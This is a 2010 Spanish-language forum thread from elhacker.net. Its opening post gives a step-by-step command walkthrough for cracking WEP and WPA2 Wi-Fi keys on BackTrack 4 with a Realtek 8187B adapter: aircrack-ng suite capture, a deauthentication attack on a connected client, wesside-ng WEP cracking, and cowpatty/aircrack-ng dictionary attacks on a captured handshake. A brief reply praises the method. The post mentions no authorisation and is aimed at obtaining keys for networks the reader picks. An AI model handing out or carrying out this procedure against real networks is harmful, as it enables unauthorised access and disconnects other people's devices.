elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Wireless
| | |-+  Wireless en Linux
| | | |-+  Realtek8187B clave WEP Y WPA2 con BT4
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Realtek8187B clave WEP Y WPA2 con BT4  (Leído 4,098 veces)
kriztianxxx

Desconectado Desconectado

Mensajes: 5


Ver Perfil
Realtek8187B clave WEP Y WPA2 con BT4
« en: 28 Junio 2010, 00:51 am »

Hola estimados amigos. Hago este post para confirmar ell funcionamiento respecto a auditorias con chipset nuevo de Realtek8187B y BackTrack 4
Despues de varias semanas sentado frente a mi computadora tratando de lograr obtener las preciadas claves de seguridad wireless encontre una manera para este chipset, esto no es una novedad, o quizas para muchos si, lo unico que pretendo es demostrar que si funciona nada mas y acepto cualquier comentario o critica, porque no soy un experto en el tema, pero ya con el tiempo estoy avanzando de a poco con los conocimientos.
Estas maneras de conseguir las claves seguro que las han visto en algun video de Youtub.
Aca les detallo de manera minuciosa los pasos:


Clave WEP:

Levantar interfaz inalambrica en modo Monitor en mi realtek8187b es asi.. Puede variar segun la marca y distribucion de linux.
iwconfig wlan0 mode monitor
airmon-ng start wlan0 ------>levanta una interfaz paralela que se llamara seguramente (mon0)

Luego escaneo con la placa inalambrica en modo monitor
airodump-ng mon0 -----> Notese que puse mon0 y no wlan0. A mi me funciono con mon0
Selecciono la red que voy a crackear y tomo todos los datos (bssid,essid,channel)
Cuando la haya elegido detenemos en airodump-ng con crtl+c y ponemos:
airodump-ng -w nombrearchivo -c numero de canal --bssid xx:xx:xx:Xx:xx:xx mon0
-nombre de archivo: puede ser cualquier nombre, pueden utilizar el mismo nombre ESSID
-c: es el numero del canal ej: 8
--bssid: es la MAC del ap  ej: 00:e0:2e:11:22:33

Luego abrimos otra ventana (Shell console)
iwconfig wlan0 channel 8  ------> Numero que coresponda al canal
iwconfig wlan0 rate auto   ------> Esto es por seguridad para que se adapte a cualquier velocidad.

Luego en la misma ventana hacemos un ataque de desautentificaion a un cliente conectado. De no tener uno, esperar a que aparezca jejej. Lo hacemos asi:
aireplay-ng -0 1 -a bssid -c  cliente mon0
-bssid: es la mac del AP
-cliente: es la mac de un cliente.
Notese que en la ventana del airodump-ng el numero de #DATA tiene que empezar a correr mas rapido.
Luego en otra ventana (shell console)
Aca esta usaremos la utilidad wesside-ng. Se usa asi
wesside-ng -i mon0
Esto acelera los #DATA aun mas y Crackea a la vez. Tendremos que esperar algunos minutos, en mi caso en todo el proceso tardé unos 15 minutos.
El wesside-ng te dara la clave en hex.

Luego para conectar a la red si es que quieres probar tienes que hacer lo sgte:
Primero cambiar el mode de funcionamiento de la placa ianlambrica, recuerda que esta en modo monitor.
airmon-ng stop mon0
ifconfig wlan0 down
iwconfig mode managed
ifconfig wlan0 up

Luego tratamos de conectarnos asi:
iwconfig wlan0 essid (nombre de la red) ap (mac del AP) channel (numero de canal) key (clave en hex)
Si tuvieses de alguna manera la clave en ascii creo que tienes que usar------> key s: (clave ascii)
Otra manera sencilla en BACKTRACK 4 seria:
wicd ----> esto activa la funcion grafica de redes.

CLAVE WPA2
Los pasos son iguales a los anteriores, a diferencia que no usaremos el wesside-ng, a cambio de este usaremos las utilidades aircrack-ng y cowpatty.
Destaco que para obtener este tipo de clave es fundamental tener una buena recepcion del AP con nuestra placa de red y que ese AP tenga clientes asociados. De no ser asi no podremos obtener el preciado HANDSHAKE .
En BackTrack 4 la forma es la siguiente:

En una  shell console
cd /pentest/wireless/cowpatty + ENTER  -----> esto se puede copiar y pegar
./cowpatty -r /root/nombre del archivo-01.cap -f dict -s Nombre de la red

En otra shell console
cd /pentest/wireless/aircrack-ng/test + ENTER  ---------->esto se puede copiar y pegar
aircrack-ng -w password.lst /root/nombre del archivo-01.cap


Fuente: http://www.youtube.com/watch?v=OGvCOV6Nh7A
Bueno espero que les sirva, como dije antes acepto cualquier comentario bye
Cristian de Mendoza Argentina

 

En línea

Sh4k4


Desconectado Desconectado

Mensajes: 965


xMHT


Ver Perfil
Re: Realtek8187B clave WEP Y WPA2 con BT4
« Respuesta #1 en: 1 Julio 2010, 12:19 pm »

si tambien ayuda!! metodo clasico con el wess a mi personalmete me gusta usar mas dispositivos wifi lanzando mas ataques!! y funciona!!
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Clave seguridad WPA2 router con firm dd-wrt
Wireless en Linux
Chachetoni 0 2,532 Último mensaje 30 Junio 2011, 15:36 pm
por Chachetoni
Sacar clave Wpa2 de onoXXXX "
Hacking Wireless
demon61 0 3,946 Último mensaje 7 Marzo 2012, 17:33 pm
por demon61
Descifrar clave wpa2 de mi wifi
Wireless en Linux
bertonne 3 3,321 Último mensaje 4 Noviembre 2012, 11:27 am
por bertonne
traducir clave wpa/wpa2 psk
Hacking Wireless
dani-lazo 2 6,810 Último mensaje 4 Noviembre 2015, 23:10 pm
por dani-lazo
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines